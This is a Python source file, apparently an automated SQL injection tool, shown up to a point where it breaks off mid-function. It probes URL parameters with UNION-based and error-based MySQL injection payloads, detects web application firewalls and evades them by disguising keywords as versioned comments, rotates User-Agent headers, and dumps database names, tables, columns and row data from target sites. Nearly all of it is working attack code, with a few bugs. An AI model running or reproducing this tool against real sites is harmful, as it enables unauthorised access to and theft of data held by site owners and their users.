4 | # You can quoted me as a source. 5 | 6 | 7 | import requests 8 | from termcolor import colored 9 | from XGDlib import block_cutter, ipuser, rand_agent 10 | 11 | 12 | 13 | def focpa (url, param): 14 | burl = "" 15 | i = 0 16 | ca = 0 17 | cb = 0 18 | tmp = "" 19 | 20 | while (i < len(url)): 21 | if (url[i] == '?' or url[i] == '&'): 22 | i += 1 23 | ca = i 24 | while (i < len(url) and url[i] != param[len(param)-1]): 25 | i += 1 26 | cb = i 27 | tmp = block_cutter(url, ca, cb) 28 | if (tmp == param): 29 | burl = block_cutter(url, 0, cb) 30 | 31 | return burl 32 | else: 33 | i = ca+1 34 | i += 1 35 | 36 | return -1 37 | 38 | 39 | 40 | def turing_range (nc_c, id_c, data): 41 | ndata = "" 42 | i = 1 43 | while (i <= nc_c): 44 | if (i == nc_c): 45 | if (data != '' and i == id_c): 46 | ndata += str(data) 47 | else: 48 | ndata += str(i) 49 | else: 50 | if (data != '' and i== id_c): 51 | ndata += str(data)+"," 52 | else: 53 | ndata += str(i)+"," 54 | i += 1 55 | 56 | return ndata 57 | 58 | 59 | 60 | def turing_fields (fields): 61 | ndata = "" 62 | i = 0 63 | while (i < len(fields)): 64 | if (i == len(fields)-1): 65 | ndata += "0x7c,"+fields[i] 66 | else: 67 | ndata += "0x7c,"+fields[i]+",0x7c,0x3e," 68 | i += 1 69 | 70 | return ndata 71 | 72 | 73 | 74 | def turing_heur (size): 75 | ndata = "" 76 | i = 0 77 | 78 | while (i <= size): 79 | if (i == size): 80 | ndata += "CHAR(088,071,068,079,082,075,013,010)" 81 | else: 82 | ndata += "CHAR(088,071,068,079,082,075,013,010)," 83 | i += 1 84 | 85 | return ndata 86 | 87 | 88 | def sbws (string): 89 | 90 | string = string.replace(" ", "+") 91 | string = string.replace("UNION", "/*!50000UnIoN*/") 92 | string = string.replace("ORDER", "/*!50000OrDeR*/") 93 | string = string.replace("GROUP_CONCAT", "/*!50000GrOuP_CoNcAt*/") 94 | string = string.replace("CONCAT", "/*!50000CoNcAt*/") 95 | string = string.replace("CHAR", "/*!50000ChAr*/") 96 | string = string.replace("FROM", "/*!50000FrOm*/") 97 | string = string.replace("WHERE", 
"/*!50000WhErE*/") 98 | string = string.replace("RAND", "/*!50000RaNd*/") 99 | string = string.replace("FLOOR", "/*!50000FlOoR*/") 100 | string = string.replace("HEX", "/*!50000HeX*/") 101 | string = string.replace("UNHEX", "/*!50000UnHeX*/") 102 | string = string.replace("LIMIT", "/*!50000LiMiT*/") 103 | string = string.replace("ELT", "/*!50000ElT*/") 104 | string = string.replace("SLEEP", "/*!50000SlEeP*/") 105 | string = string.replace("SELECT", "/*!50000SeLeCt*/") 106 | string = string.replace("COUNT", "/*!50000CoUnT*/") 107 | string = string.replace("@@version", "/*!50000@@VeRsIoN*/") 108 | string = string.replace("version()", "/*!50000VeRsIoN()*/") 109 | string = string.replace("database()", "/*!50000DaTaBaSe()*/") 110 | string = string.replace("TABLE_NAME", "/*!50000TaBlE_NaMe*/") 111 | string = string.replace("COLUMN_NAME", "/*!50000CoLuMn_NaMe*/") 112 | string = string.replace("INFORMATION_SCHEMA.TABLES", "/*!50000InFoRmAtIoN_ScHeMa.TaBlEs*/") 113 | string = string.replace("INFORMATION_SCHEMA.COLUMNS", "/*!50000InFoRmAtIoN_ScHeMa.CoLuMnS*/") 114 | string = string.replace("INFORMATION_SCHEMA.PLUGINS", "/*!50000InFoRmAtIoN_ScHeMa.PlUgInS*/") 115 | string = string.replace("TABLE_SCHEMA", "/*!50000TaBlE_ScHeMa*/") 116 | string = string.replace("GROUP", "/*!50000GrOuP*") 117 | string = string.replace("LIKE", "/*!50000LiKe*/") 118 | string = string.replace("BY", "/*!50000By*/") 119 | string = string.replace("CONCAT_WS", "/*!50000CoNcAt_Ws*/") 120 | string = string.replace("HAVING", "/*!50000HaViNg*/") 121 | string = string.replace("MIN", "/*!50000MiN*/") 122 | string = string.replace("CAST", "/*!50000CaSt*/") 123 | string = string.replace("AS", "/*!50000As*/") 124 | string = string.replace("CHAR", "/*!50000ChAr*/") 125 | string = string.replace("AND", "/*!50000AnD*/") 126 | string = string.replace("OR", "/*!50000Or*/") 127 | 128 | return string 129 | 130 | 131 | def stress_url (url, param): 132 | burl = "" 133 | nurl = "" 134 | data = "" 135 | waf = 0 136 | 
result = [] 137 | burl = focpa(url, param) 138 | 139 | user_agent = rand_agent() 140 | headers = {'User-Agent': user_agent} 141 | print colored(" [+] User-Agent: "+user_agent, 'green') 142 | print colored(" [*] Stress URL ... ", 'green') 143 | nurl = burl 144 | nurl += "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))" 145 | #print (nurl) 146 | 147 | r = requests.get(nurl, headers=headers) 148 | data = r.text.encode('utf-8') 149 | 150 | if (data.find("Mod_Security") > -1 or data.find("You don't have permission ") > -1): 151 | print colored(" [!] WAF Detected ! ", 'red') 152 | waf = 1 153 | 154 | 155 | nurl = burl 156 | nurl += "-300 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,database(),156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300 --" 157 | if (waf == 1): 158 | nurl = sbws(nurl) 159 | 160 | #print (nurl) 161 | r = requests.get(nurl, headers=headers) 162 | data = r.text.encode('utf-8') 163 | 164 | if (data.find('The used SELECT statements ') > -1): 165 | print 
colored(" [!] ERROR-BASED FOUND !", 'green') 166 | if (waf == 1): 167 | result.append(1) 168 | else: 169 | result.append(0) 170 | 171 | result.append(2) 172 | return result 173 | 174 | else: 175 | nurl = burl 176 | nurl += "777 ORDER BY 777 --" 177 | if (waf == 1): 178 | nurl = sbws(nurl) 179 | 180 | #print (nurl) 181 | r = requests.get(nurl, headers=headers) 182 | data = r.text.encode('utf-8') 183 | 184 | if (data.find("Unknown column '") > -1 and data.find("' in 'order clause'") > -1 or data.find('mysql_num_rows():') > -1 or data.find('mysql_num_row():') > -1): 185 | print colored(" [!] UNION-BASED FOUND !", 'green') 186 | if (waf == 1): 187 | result.append(1) 188 | else: 189 | result.append(0) 190 | 191 | result.append(1) 192 | return result 193 | 194 | else: 195 | print colored(" [*] TEST HEURISTIC-UNION ...", 'green') 196 | if (waf == 1): 197 | result.append(1) 198 | else: 199 | result.append(0) 200 | 201 | result.append(3) 202 | return result 203 | 204 | 205 | 206 | 207 | def heuristic_nc (url, param, waf): 208 | burl = "" 209 | nurl = "" 210 | i = 0 211 | ids_inject = [] 212 | rangestr = "" 213 | data = "" 214 | 215 | user_agent = rand_agent() 216 | headers = {'User-Agent': user_agent} 217 | print colored(" [+] User-Agent: "+user_agent, 'green') 218 | 219 | burl = focpa(url, param) 220 | 221 | print colored(" [*] COUNT, can take a while, wait ...", 'cyan') 222 | while (i <= 55): 223 | nurl = burl 224 | rangestr = turing_heur(i) 225 | 226 | nurl += "-1984 UNION SELECT "+rangestr+" --" 227 | if (waf == 1): 228 | nurl = sbws(nurl) 229 | 230 | #print (nurl) 231 | if (i == 1): 232 | print colored("- 1 to 10 ", 'cyan') 233 | if (i == 11): 234 | print colored("- 10 to 20 ", 'cyan') 235 | if (i == 21): 236 | print colored("- 20 to 30 ", 'cyan') 237 | if (i == 31): 238 | print colored("- 30 to 40 ", 'cyan') 239 | if (i == 41): 240 | print colored("- 40 to 55 ", 'cyan') 241 | 242 | r = requests.get(nurl, headers=headers) 243 | data = r.text.encode('utf-8') 244 | 245 | 
if (data.find('XGDORK') > -1): 246 | print colored(" [!] URL appears as injectable ...", 'green') 247 | return i+1 248 | 249 | i += 1 250 | 251 | print colored(" [!] Heuristic nc failed ", 'red') 252 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 253 | exit(0) 254 | 255 | 256 | 257 | def count_nc (url, param, waf): 258 | burl = "" 259 | nurl = "" 260 | i = 1 261 | 262 | user_agent = rand_agent() 263 | headers = {'User-Agent': user_agent} 264 | print colored(" [+] User-Agent: "+user_agent, 'green') 265 | 266 | burl = focpa(url, param) 267 | 268 | print colored(" [*] COUNT, Can take a while, wait ...", 'cyan') 269 | while (i <= 55): 270 | nurl = burl 271 | nurl += str(i)+" ORDER BY "+str(i)+" --" 272 | if (waf == 1): 273 | nurl = sbws(nurl) 274 | 275 | #print (nurl) 276 | if (i == 1): 277 | print colored("- 1 to 10 ", 'cyan') 278 | if (i == 11): 279 | print colored("- 10 to 20 ", 'cyan') 280 | if (i == 21): 281 | print colored("- 20 to 30 ", 'cyan') 282 | if (i == 31): 283 | print colored("- 30 to 40 ", 'cyan') 284 | if (i == 41): 285 | print colored("- 40 to 55 ", 'cyan') 286 | 287 | r = requests.get(nurl, headers=headers) 288 | data = r.text.encode('utf-8') 289 | 290 | if (data.find("Unknown column '") > -1 and data.find("' in 'order clause'") > -1 or data.find('mysql_num_rows():') > -1 or data.find('mysql_num_row():') > -1): 291 | #print ("DEBUG ERROR FOUND: "+str(i)) 292 | print colored(" [+] URL appears as injectable ...", 'green') 293 | return (i-1) 294 | 295 | i += 1 296 | 297 | print colored(" [!] 
Count nc failed ", 'red') 298 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 299 | exit(0) 300 | 301 | 302 | 303 | def id_checker (url, param, waf, nc): 304 | burl = "" 305 | nurl = "" 306 | data = "" 307 | rangestr = "" 308 | i = 0 309 | 310 | user_agent = rand_agent() 311 | headers = {'User-Agent': user_agent} 312 | print colored(" [+] User-Agent: "+user_agent, 'green') 313 | 314 | burl = focpa(url, param) 315 | 316 | while (i <= nc): 317 | nurl = burl 318 | rangestr = turing_range(nc, i, "CHAR(088,071,068,079,082,075,013,010)") 319 | nurl += "-1984 UNION SELECT "+rangestr+" --" 320 | if (waf == 1): 321 | nurl = sbws(nurl) 322 | 323 | #print (nurl) 324 | r = requests.get(nurl, headers=headers) 325 | data = r.text.encode('utf-8') 326 | 327 | if (data.find('XGDORK') > -1): 328 | #print ("ID Injectable: "+str(i)) 329 | return i 330 | 331 | i += 1 332 | 333 | print colored(" [!] Id checker failed ", 'red') 334 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 335 | exit(0) 336 | 337 | 338 | 339 | def parserDump (data, mod): 340 | i = 0 341 | ca = 0 342 | cb = 0 343 | data_list = [] 344 | 345 | while (i < len(data)-1): 346 | if (data[i] == '(' and data[i+1] == '^' and data[i+2] == '#'): 347 | i += 5 348 | ca = i 349 | while (i < len(data)-2 and (data[i] != '(' and data[i+2] != '#')): 350 | if (i == data.find("' for key")): 351 | break 352 | if (data[i] == '<'): 353 | break 354 | i += 1 355 | i -= 1 356 | cb = i 357 | tmp = block_cutter(data, ca, cb) 358 | data_list.append(tmp) 359 | 360 | print colored(" "+tmp, 'yellow') 361 | if (mod == 1): 362 | return data_list 363 | i += 1 364 | 365 | return data_list 366 | 367 | 368 | 369 | def parserDump_b (data, limiter): 370 | i = 0 371 | ca = 0 372 | cb = 0 373 | tmp = "" 374 | data_list = [] 375 | 376 | while (i < len(data)-1): 377 | if (data.find("Duplicate entry") > -1): 378 | i = data.find("Duplicate entry") 379 | ca = i 
            while (i < len(data)-1 and data[i] != "'"):
                i += 1
            cb = i
            tmp = block_cutter(data, ca, cb)
            if (tmp == "Duplicate entry '" or tmp == "duplicate entry '" or tmp == ">Duplicate entry '" or tmp == ">duplicate entry '"):

                i += 1
                ca = i
                while (i < len(data)-1 and data[i] != limiter):
                    i += 1
                cb = i
                tmp = block_cutter(data, ca, cb-1)
                data_list.append(tmp)
                print colored(" "+tmp, 'yellow')

                #return data_list
                return tmp
        i += 1




def dumpDatabase (url, param, waf, modx, nc, idx):
    burl = ""
    nurl = ""
    data = ""
    rangestr = ""
    database_list = []
    tmpfile = file

    user_agent = rand_agent()
    headers = {'User-Agent': user_agent}
    print colored(" [+] User-Agent: "+user_agent, 'green')

    burl = focpa(url, param)

    if (modx == 1):
        nurl = burl
        rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))")
        nurl += "-1984 UNION SELECT "+rangestr+" --"
        if (waf == 1):
            nurl = sbws(nurl)
        #print (nurl)

        r = requests.get(nurl, headers=headers)
        data = r.text.encode('utf-8')

        if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
            print colored(" [*] Change syntax ... ", 'cyan')
            nurl = burl
            rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))")
            nurl += "-1984 UNION SELECT "+rangestr+" --"
            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')

            database_list = parserDump(data, 1)
        else:
            database_list = parserDump(data, 1)

        if (len(database_list) > 0):
            print colored(" [+] URL is injectable", 'green')
            print (str(database_list))

            tmpfile = open("tmpfile", 'w')
            tmpfile.write(str(modx)+"\n")
            tmpfile.write(str(waf)+"\n")
            tmpfile.write(database_list[0]+"\n")
            tmpfile.write(str(nc)+"\n")
            tmpfile.write(str(idx)+"\n")
            tmpfile.close()

            return database_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)


    elif (modx == 2):
        nurl = burl
        nurl += "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --"
        if (waf == 1):
            nurl = sbws(nurl)
        #print (nurl)
        r = requests.get(nurl, headers=headers)
        data = r.text.encode('utf-8')

        if (data.find("(^#^)") == -1):
            print colored(" [*] Change syntax ... ", 'cyan')
            nurl = burl
            nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FL0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')
            if (data.find("(^#^)") == -1):
                print colored(" [*] Change syntax ... ", 'cyan')
                nurl = burl
                nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
                if (waf == 1):
                    nurl = sbws(nurl)
                #print (nurl)
                r = requests.get(nurl, headers==headers)
                data = r.text.encode('utf-8')

                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')

            else:
                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
        else:
            tmp = str(parserDump(data, 1))
            tmp = tmp.replace('[', '').replace(']', '').replace("'", '')

        if (tmp != ''):
            print colored(" [+] URL appears as injectable ...", 'green')
            database_list.append(tmp)
            nurl = burl
            nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(database() AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')
            if (data.find("(^#^)") == -1):
                print colored(" [*] Change syntax ... ", 'cyan')
                nurl = burl
                nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
                if (waf == 1):
                    nurl = sbws(nurl)
                #print (nurl)
                r = requests.get(nurl, headers=headers)
                data = r.text.encode('utf-8')
                if (data.find("(^#^)") == -1):
                    print colored(" [*] Change syntax ... ", 'cyan')
                    nurl = burl
                    nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
                    if (waf == 1):
                        nurl = sbws(nul)
                    #print (nurl)
                    r = requests.get(nurl, headers=headers)
                    data = r.text.encode('utf-8')

                    tmp = str(parserDump(data, 1))
                    tmp = tmp.replace('[', '').replace(']', '').replace("'", '')

                else:
                    tmp = str(parserDump(data, 1))
                    tmp = tmp.replace('[', '').replace(']', '').replace("'", '')

            else:
                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')

            if (tmp != ''):
                database_list.append(tmp)
            else:
                print colored(" [-] Injection attempt failed ", 'red')
                print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
                exit(0)
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)

        if (len(database_list) > 1):
            print colored(" [+] URL is injectable", 'green')
            print (str(database_list))
            tmpfile = open("tmpfile", 'w')
            tmpfile.write(str(modx)+"\n")
            tmpfile.write(str(waf)+"\n")
            tmpfile.write(str(database_list[1])+"\n")
            tmpfile.write(str(nc)+"\n")
            tmpfile.write(str(idx)+"\n")
            tmpfile.close()

            return database_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)



def dumpTables (url, param, waf, modx, nc, idx):
    burl = ""
    nurl = ""
    data = ""
    rangestr = ""
    tmp = ""
    stress = 0
    error_syntax = 0
    i = 0
    tables_list = []

    user_agent = rand_agent()
    headers = {'User-Agent': user_agent}
    print colored(" [+] User-Agent: "+user_agent, 'green')

    burl = focpa(url, param)

    if (modx == 1):
        nurl = burl
        rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),TABLE_NAME,CHAR(040,118,035,118,041))")
        nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() --"
        if (waf == 1):
            nurl = sbws(nurl)
        #print (nurl)
        r = requests.get(nurl, headers=headers)
        data = r.text.encode('utf-8')
        if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
            print colored(" [*] Change syntax ... ", 'cyan')
            rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),TABLE_NAME,CHAR(040,118,035,118,041))")
            while (stress == 0):
                nurl = burl
                nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE database() LIMIT "+str(i)+",1 --"
                if (waf == 1):
                    nurl = sbws(nurl)
                #print(nurl)

                r = requests.get(nurl, headers=headers)
                data = r.text.encode('utf-8')

                if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
                    stress = 1

                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                if (tmp != ''):
                    tables_list.append(tmp)

                i += 1
        else:
            tables_list = parserDump(data, 0)

        if (len(tables_list) > 0):
            print (str(tables_list))
            return tables_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)

    elif (modx == 2):
        while (stress == 0):
            nurl = burl
            if (error_syntax == 0):
                nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(TABLE_NAME AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
            elif (error_syntax == 1):
                nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,TABLE_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
            elif (error_syntax == 2):
                nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,TABLE_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE database() LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"

            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')

            if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Subquery returns more than 1 row") > -1 or data.find("this is incompatible ") > -1 or data.find("Nothing found!") > -1 or data.find("not found") > -1 and data.find("(^#^)") == -1):
                print colored(" [*] Change syntax ... ", 'cyan')
                error_syntax += 1
                i = 0
            else:
                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                if (tmp != ''):
                    tables_list.append(tmp)
                else:
                    stress = 1

            i += 1

        if (len(tables_list) > 0):
            print (str(tables_list))
            return tables_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)



def dumpColumns (url, param, waf, modx, nc, idx, table):
    burl = ""
    nurl = ""
    data = ""
    tmp = ""
    rangestr = ""
    stress = 0
    error_syntax = 0
    i = 0
    columns_list = []

    user_agent = rand_agent()
    headers = {'User-Agent': user_agent}
    print colored(" [+] User-Agent: "+user_agent, 'green')


    burl = focpa(url, param)

    if (modx == 1):
        nurl = burl
        rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))")
        nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME='"+table+"' --"
        if (waf == 1):
            nurl = sbws(nurl)
        #print (nurl)

        r = requests.get(nurl, headers=headers)
        data = r.text.encode('utf-8')

        if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
            print colored(" [*] Change syntax ... ", 'cyan')
            nurl = burl
            nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME LIKE 0x"+str(table).encode('hex')+" --"
            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')
            if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
                print colored(" [*] Change syntax ... ", 'cyan')
                rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))")
                while (stress == 0):
                    nurl = burl
                    nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME LIKE 0x"+str(table).encode('hex')+" LIMIT "+str(i)+",1 --"
                    if (waf == 1):
                        nurl = sbws(nurl)
                    #print (nurl)
                    r = requests.get(nurl, headers=headers)
                    data = r.text.encode('utf-8')
                    if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
                        stress = 1

                    tmp = str(parserDump(data, 1))
                    tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                    if (tmp != ''):
                        columns_list.append(tmp)

                    i += 1

            else:
                columns_list = parserDump(data, 0)

        else:
            columns_list = parserDump(data, 0)

        if (len(columns_list) > 0):
            print (str(columns_list))
            return columns_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)


    elif (modx == 2):
        while (stress == 0):
            nurl = burl
            if (error_syntax == 0):
                nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(COLUMN_NAME AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x"+table.encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --"
            elif (error_syntax == 1):
                nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME=0x"+table.encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"
            elif (error_syntax == 2):
                nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE database() AND TABLE_NAME=0x"+table.encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --"

            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')

            if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Subquery returns more than 1 row") > -1 or data.find("this is incompatible ") > -1 or data.find("Nothing found!") > -1 or data.find("not found") > -1 and data.find("(^#^)") == -1):
                print colored(" [*] Change syntax ... ", 'cyan')
                error_syntax += 1
                i = 0
            else:
                tmp = str(parserDump(data, 1))
                tmp = tmp.replace('[', '').replace(']', '').replace("'", '')
                if (tmp != ''):
                    columns_list.append(tmp)
                else:
                    stress = 1

            i += 1

        if (len(columns_list) > 0):
            print (str(columns_list))
            return columns_list
        else:
            print colored(" [-] Injection attempt failed ", 'red')
            print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red')
            exit(0)




def dumpData_s (url, param, waf, modx, nc, idx, table, fields, dbx):
    burl = ""
    nurl = ""
    data = ""
    tmp = ""
    tmp_l = ""
    rangestr = ""
    stress = 0
    error_syntax = 0
    i = 0
    j = 0
    data_s_list = []


    user_agent = rand_agent()
    headers = {'User-Agent': user_agent}
    print colored(" [+] User-Agent: "+user_agent, 'green')

    burl = focpa(url, param)

    if (modx == 1):
        nurl = burl
        insertFields = turing_fields(fields)
        rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),"+str(insertFields)+",CHAR(040,118,035,118,041))")
        nurl += "-1984 UNION SELECT "+rangestr+" FROM '"+table+"' --"
        if (waf == 1):
            nurl = sbws(nurl)
        #print (nurl)
        r = requests.get(nurl, headers=headers)
        data = r.text.encode('utf-8')
        if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
            print colored(" [*] Change syntax ... ", 'cyan')
            nurl = burl
            nurl += "-1984 UNION SELECT "+rangestr+" FROM 0x"+str(table.encode('hex'))+" --"
            if (waf == 1):
                nurl = sbws(nurl)
            #print (nurl)
            r = requests.get(nurl, headers=headers)
            data = r.text.encode('utf-8')
            if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1):
                print colored(" [*] Change syntax ... ", 'cyan')
                while (stress == 0):
                    nurl = burl
                    j = 0
                    while (j < len(fields) and stress == 0):
                        nurl = burl
                        rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),"+str(fields[j])+",CHAR(040,118,035,118,041))")
                        nurl += "-1984 UNION SELECT "+rangestr+" FROM "+table+" LIMIT "+str(i)+",1 --"
                        if (waf == 1):
                            nurl = sbws(nurl)
                        #print (nurl)
